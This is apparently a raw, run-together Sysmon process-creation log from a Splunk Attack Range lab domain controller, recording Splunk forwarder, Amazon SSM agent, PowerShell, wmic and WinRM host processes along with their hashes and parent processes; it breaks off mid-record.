-EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-3E14-6078-A389-050000000000}0x589a30HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{A8622C2F-3DED-6078-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 154100x80000000000000002917Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:30.499{A8622C2F-3E16-6078-7A00-00000000AE01}3380C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-3E10-6078-0288-050000000000}0x588020HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{A8622C2F-3DED-6078-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 154100x80000000000000002825Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:21.519{A8622C2F-3E0D-6078-7800-00000000AE01}2752C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000002801Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:20.646{A8622C2F-3E0C-6078-7700-00000000AE01}3856C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe8.0.2Monitor windows event logssplunk ApplicationSplunk Inc.splunk-winevtlog.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=A735F697C6C533F20D023E4318824194,SHA256=295236CFB06A5F9C1F76EECC468F9A070BFCB5C4E094918059EC86BBB654E119,IMPHASH=85F4904CF3562658E303E53274ABD436{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000002785Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:19.759{A8622C2F-3E0B-6078-7600-00000000AE01}2060C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000002771Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:19.076{A8622C2F-3E0B-6078-7500-00000000AE01}2752C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000002751Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:18.193{A8622C2F-3E0A-6078-7400-00000000AE01}3764C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000002736Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:17.302{A8622C2F-3E09-6078-7300-00000000AE01}3624C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe8.0.2Performance monitorsplunk ApplicationSplunk Inc.splunk-perfmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=1F3027C93882E5D5A667B84CCEF3ED67,SHA256=504CDB3742BCBF617C837270CCEC0243205B7BF0A6AB5117EFB838DD2F004AAC,IMPHASH=53D37CD53647C5D82FCFA9E6970E154E{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000002722Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:16.410{A8622C2F-3E08-6078-7200-00000000AE01}2044C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000002705Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:15.520{A8622C2F-3E07-6078-7100-00000000AE01}4052C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000002689Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:14.628{A8622C2F-3E06-6078-7000-00000000AE01}3752C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000002670Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:13.770{A8622C2F-3E05-6078-6F00-00000000AE01}2752C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe8.0.2Remote Performance monitor using WMIsplunk ApplicationSplunk Inc.splunk-wmi.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=5DA29397A44401083341D66B52CA8BC4,SHA256=F51A58BCBF3532B9EF1B6478839424C33EA0426BCD5C6B4B636AD25D5177379C,IMPHASH=FFEB0CD073A55A73D08AC443E4942F81{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000002650Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:13.621{A8622C2F-3E05-6078-6E00-00000000AE01}3116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-WinEvent -FilterHashtable @( @{ LogName='System'; ProviderName='Microsoft-Windows-Kernel-General'; Id=12; Level=4 }, @{ LogName='System'; ProviderName='Microsoft-Windows-WER-SystemErrorReporting'; Id=1001; Level=2 } ) | Sort-Object TimeCreated -Descending" "| Select-Object" "Id, Level, ProviderName, TimeCreated, Properties" "| ConvertTo-Json -Depth 3"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{A8622C2F-3DFF-6078-3A00-00000000AE01}3656C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 154100x80000000000000002626Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:12.812{A8622C2F-3E04-6078-6D00-00000000AE01}2984C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell2.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000002613Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:12.702{A8622C2F-3E04-6078-6C00-00000000AE01}4088C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000002600Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:12.593{A8622C2F-3E04-6078-6B00-00000000AE01}2868C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\perfmon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000002587Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:12.484{A8622C2F-3E04-6078-6A00-00000000AE01}3776C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\admon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000002574Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:12.374{A8622C2F-3E04-6078-6900-00000000AE01}4000C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinRegMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000002551Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:12.265{A8622C2F-3E04-6078-6800-00000000AE01}3872C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinPrintMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000002536Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:12.156{A8622C2F-3E04-6078-6700-00000000AE01}3828C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinNetMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000002518Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:12.069{A8622C2F-3E04-6078-6600-00000000AE01}4052C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-CimInstance Win32_PnPSignedDriver | Where-Object { $_.DeviceID -eq 'XENBUS\VEN_XS0001&DEV_VBD&REV_00000001\_' -or $_.DeviceClass -eq 'Net' -and ( $_.Manufacturer -like 'Intel*' -or $_.Manufacturer -eq 'Citrix Systems, Inc.' -or $_.Manufacturer -eq 'Amazon Inc.' -or $_.Manufacturer -eq 'Amazon Web Services, Inc.' )}" "| Select-Object" "Description, DriverVersion" "| ConvertTo-Json -Depth 3"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{A8622C2F-3DFF-6078-3A00-00000000AE01}3656C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 154100x80000000000000002504Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:12.046{A8622C2F-3E04-6078-6500-00000000AE01}4060C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinHostMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000002491Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:11.939{A8622C2F-3E03-6078-6400-00000000AE01}3144C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinEventLog.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000002478Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:11.820{A8622C2F-3E03-6078-6300-00000000AE01}3836C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\MonitorNoHandle.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000002458Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:11.658{A8622C2F-3E03-6078-6200-00000000AE01}3704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-CimInstance Win32_PnPEntity | Where-Object { $_.Service -eq 'xenvbd' }" "| Select-Object" DeviceID "| ConvertTo-Json -Depth 3"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{A8622C2F-3DFF-6078-3A00-00000000AE01}3656C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 154100x80000000000000002441Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:11.611{A8622C2F-3E03-6078-6100-00000000AE01}4024C:\Windows\System32\wbem\WMIC.exe10.0.14393.0 (rs1_release.160715-1616)WMI Commandline UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationwmic.exewmic OS get OperatingSystemSKU /format:listC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072,IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E{A8622C2F-3DFF-6078-3A00-00000000AE01}3656C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 154100x80000000000000002427Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:11.536{A8622C2F-3E03-6078-6000-00000000AE01}2752C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{A8622C2F-3E03-6078-5F00-00000000AE01}2484C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt 2>&1 154100x80000000000000002414Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:11.530{A8622C2F-3E03-6078-5F00-00000000AE01}2484C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt 2>&1C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000002396Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:11.255{A8622C2F-3E03-6078-5E00-00000000AE01}4052C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-3E03-6078-5D00-00000000AE01}4004C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 154100x80000000000000002383Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:11.248{A8622C2F-3E03-6078-5D00-00000000AE01}4004C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{A8622C2F-3E03-6078-5C00-00000000AE01}4084C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 154100x80000000000000002370Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:11.242{A8622C2F-3E03-6078-5C00-00000000AE01}4084C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3E00-6078-4C00-00000000AE01}3632C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 154100x80000000000000002351Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:11.023{A8622C2F-3E03-6078-5B00-00000000AE01}3740C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Amazon\PVDriver'" "| Select-Object" "Name, Version" "| ConvertTo-Json -Depth 3"C:\Windows\system32\NT 